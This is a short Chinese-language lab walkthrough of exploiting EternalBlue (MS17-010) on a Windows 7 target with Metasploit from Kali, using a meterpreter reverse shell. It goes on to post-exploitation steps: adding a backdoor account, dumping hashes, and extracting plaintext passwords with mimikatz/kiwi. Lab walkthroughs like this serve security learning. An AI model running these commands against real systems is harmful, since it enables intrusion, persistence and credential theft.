kail使用msf工具利用永恒之蓝漏洞攻击win7_kali漏洞攻击win7 x64

实验环境

靶机：win7

IP：192.168.43.144

攻击机：kali

ip:192.168.43.150

实验开始：

第一步：

打开msfconsole进入到工具里面

搜索一下永恒之蓝漏洞

search ms17_010

这上面有三个可以利用的漏洞我们选择第一个

use exploit/windows/smb/ms17_010_eternalblue

接下来我们可以查看需要设置的IP地址和端口

show options 另外Required为yes的也需要设置

set rhosts 192.168.43.144 

除此之外还需要设置payload

set payload

set payload windows/x64/meterpreter/reverse_tcp

设置完成后就进行攻击

我们输入shell就可以进入到win7的cmd

如果出现乱码的话就输入

chcp 65001

我们查看win7的IP

ipconfig

添加用户

net user hacker hacker123 /add

查看系统信息

sysinfo

还可以使用mimkatz抓取明文密码

先使用hashdump抓取密码

使用kiwi

load kiwi

查看一下帮助命令

help kiwi

 最后使用creds_all命令抓取明文密码

 

还可以使用screenshot命令截屏

这是几个渗透后可以使用的命令

其实还有很多可以执行的操作就不一一列举了